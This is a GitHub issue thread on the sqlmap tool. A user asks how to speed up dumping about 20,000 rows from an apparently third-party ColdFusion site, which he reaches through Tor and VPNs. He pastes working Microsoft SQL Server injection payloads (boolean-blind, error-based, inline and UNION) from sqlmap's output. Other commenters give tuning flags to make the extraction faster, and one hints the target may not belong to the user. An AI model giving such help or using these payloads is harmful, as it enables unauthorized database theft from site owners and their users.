### ISSUE TITLE
Retrieved data so slow

### ISSUE THREAD

**Issue by toptuto** [sqlmapproject/sqlmap#3981]
My problems is when I retrieved data from somewebsite.com/category.cfm?categoryID=999999.9 , it had about 20k data , every first data like about 50-100 first data was retrieved very fast like about 2 second/data , but after that it became 20-30s/ data . What should I do now ? Thanks
I used tor proxy , time-sec=5 , on Ubuntu

**Comment by stamparm** [comment]
1) You haven't filled the Issue template
2) I don't know any detail on the SQLi techniques used
3) I don't know whether sqlmap asked you anything in between (e.g. `WARNING` about the `ORDER BY`)
4) I don't know the DBMS type

How to proceed????

**Comment by toptuto** [comment]
sorry here : 
 [WARNING] it appears that you have provided tainted parameter values ('categoryID=999999.9') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[18:32:48] [INFO] resuming back-end DBMS 'microsoft sql server'
[18:32:48] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('CFID=3151122;CFTOKEN=35804031'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: categoryID (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
    Payload: categoryID=(SELECT (CASE WHEN (9538=9538) THEN 9538 ELSE 9538*(SELECT 9538 UNION ALL SELECT 9820) END))

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: categoryID=999999.9 AND 2747 IN (SELECT (CHAR(113)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (2747=2747) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)))

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: categoryID=(SELECT CHAR(113)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (1909=1909) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113))

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: categoryID=999999.9 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(66)+CHAR(74)+CHAR(69)+CHAR(99)+CHAR(67)+CHAR(97)+CHAR(72)+CHAR(121)+CHAR(73)+CHAR(105)+CHAR(88)+CHAR(114)+CHAR(118)+CHAR(65)+CHAR(82)+CHAR(74)+CHAR(105)+CHAR(121)+CHAR(122)+CHAR(104)+CHAR(77)+CHAR(115)+CHAR(82)+CHAR(122)+CHAR(115)+CHAR(104)+CHAR(70)+CHAR(114)+CHAR(77)+CHAR(98)+CHAR(90)+CHAR(77)+CHAR(70)+CHAR(71)+CHAR(87)+CHAR(74)+CHAR(104)+CHAR(73)+CHAR(71)+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- CbXn
---
[18:32:51] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2000

**Comment by toptuto** [comment]
I just use sqlmap.py -u "web" -D a -T b - C c --dump

**Comment by 687766616e** [comment]
--technique U --threads 10
if u want to, add --force-partial

**Comment by 687766616e** [comment]
--technique U dump shit looks very slow is a normal thing?

**Comment by toptuto** [comment]
when I use threads it seem like this website can't handle that and always return fail

**Comment by 687766616e** [comment]
then --threads 1...

**Comment by 687766616e** [comment]
maybe --null-connection?

**Comment by 687766616e** [comment]
you're using vpn or proxy (include tor) or other thing like that?...

**Comment by toptuto** [comment]
i tried all vpn , tor and local proxy

**Comment by 687766616e** [comment]
i mean.. don't use that (if the target is yours

**Comment by stamparm** [comment]
You have a CloudFlare in between. I would say that you are lucky that anything works in the first place.

**Comment by toptuto** [comment]
ah okay , but what is the different between technique E and U and default ? Thanks

**Comment by toptuto** [comment]
@stamparm so you mean I can't get to the web have CloundFlare ?

**Comment by stamparm** [comment]
As you have different techniques you can try:

1) `--technique=U`
2) `--technique=E`
3) `--technique=Q`

and see if one of those is faster than the other

**Comment by 687766616e** [comment]
i will suggest you to use --technique E

**Comment by 687766616e** [comment]
Sqlmap has already cooperated with Google. If you have any problems, you can google it  first. 😆😉

**Comment by 687766616e** [comment]
> ah okay , but what is the different between technique E and U and default ? Thanks

this~
